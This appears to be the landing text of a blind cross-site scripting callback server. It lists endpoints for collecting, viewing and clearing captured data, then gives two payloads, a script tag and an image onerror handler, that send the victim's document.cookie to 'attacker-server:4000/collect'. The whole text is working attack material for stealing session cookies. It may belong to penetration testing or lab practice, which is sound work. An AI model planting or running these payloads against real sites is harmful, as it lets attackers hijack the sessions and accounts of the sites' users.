This server receives blind XSS callbacks.
GET/POST /collect - Receive XSS callbacksGET /captured - View all captured dataDELETE /captured - Clear captured data<script>fetch('http://attacker-server:4000/collect?cookie='+document.cookie)</script>
<img src=x onerror="new Image().src='http://attacker-server:4000/collect?c='+document.cookie">